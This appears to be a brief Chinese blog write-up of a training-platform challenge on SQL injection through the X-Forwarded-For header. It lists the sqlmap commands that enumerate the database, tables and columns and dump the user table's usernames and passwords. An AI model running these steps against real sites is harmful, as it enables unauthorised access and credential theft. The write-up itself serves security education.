X-forwarded-for注入漏洞实战
ALiDan 2019-10-21
1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;
随便输入用户名密码登录,提示有ip信息,根据题目的意思是信息是根据x-forwarded-for的纸变得,所以本题存在x-forwarded-for注入
1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示,速度比较慢,请耐心等待
2:#sqlmap -r 1.txt --current-db --batch //爆出数据库3:#sqlmap -r 1.txt -D webcalendar --tables //爆出表4:#sqlmap -r 1.txt -D webcalendar -T user --columns //爆出列5:#sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump //爆出数据库用户名和密码这是墨者平台的一道注入题
相关推荐
一对儿程序猿 0喜欢 / 0评论 2020-07-04
godfather 0喜欢 / 0评论 2020-06-13
godfather 0喜欢 / 0评论 2020-06-03
明月清风精进不止 0喜欢 / 0评论 2020-05-07
liuyang000 0喜欢 / 0评论 2020-04-20
qshpeng 0喜欢 / 0评论 2020-03-26
huolan 0喜欢 / 0评论 2019-12-18
tanrong 0喜欢 / 0评论 2019-10-22
挖山 0喜欢 / 0评论 2019-06-01
网络安全管理WL00 0喜欢 / 0评论 2016-01-31
K黄 0喜欢 / 0评论 2011-03-10
MySQLDBA 0喜欢 / 0评论 2009-05-23
GNU 0喜欢 / 0评论 2009-08-30
MySQLDBA 0喜欢 / 0评论 2008-10-07
HuangRam 0喜欢 / 0评论 2014-02-27
PlumRain 0喜欢 / 0评论 2008-10-07
hebbely 0喜欢 / 0评论 2011-11-02
zilong0 0喜欢 / 0评论 2010-05-23
jiweianquan 0喜欢 / 0评论 2015-07-09
skshenghuo 0喜欢 / 0评论 2019-05-08
xxwacm 0喜欢 / 0评论 2018-11-29
arcsinz 0喜欢 / 0评论 2018-09-01
xujinweigingko 0喜欢 / 0评论 2018-03-21
zhengxm 0喜欢 / 0评论 2018-03-03
infoscienceliu 0喜欢 / 0评论 2018-03-02
chlintin 0喜欢 / 0评论 2017-12-25
nosqlnotes 0喜欢 / 0评论 2017-12-04
chlintin 0喜欢 / 0评论 2017-08-15
唧唧歪歪 0喜欢 / 0评论 2017-07-17
shuirongc 0喜欢 / 0评论 2017-05-18
Xrapido 0喜欢 / 0评论 2017-03-14
智行晓东 0喜欢 / 0评论 2017-03-14
xujinweigingko 0喜欢 / 0评论 2017-03-01
focuseven 0喜欢 / 0评论 2017-02-15
focuseven 0喜欢 / 0评论 2017-01-17
summertie 0喜欢 / 0评论 2016-12-20
CarolWang 0喜欢 / 0评论 2016-12-01
wulantian 0喜欢 / 0评论 2016-11-16
focuseven 0喜欢 / 0评论 2016-11-15
Letitgo 0喜欢 / 0评论 2016-11-15
summertie 0喜欢 / 0评论 2016-11-09
xujinweigingko 0喜欢 / 0评论 2016-11-08
智行晓东 0喜欢 / 0评论 2016-08-31
wulantian 0喜欢 / 0评论 2016-08-29
Letitgo 0喜欢 / 0评论 2016-08-20
CarolWang 0喜欢 / 0评论 2016-08-09
阿磊的菜鸟 0喜欢 / 0评论 2016-08-02
阿磊的菜鸟 0喜欢 / 0评论 2016-06-24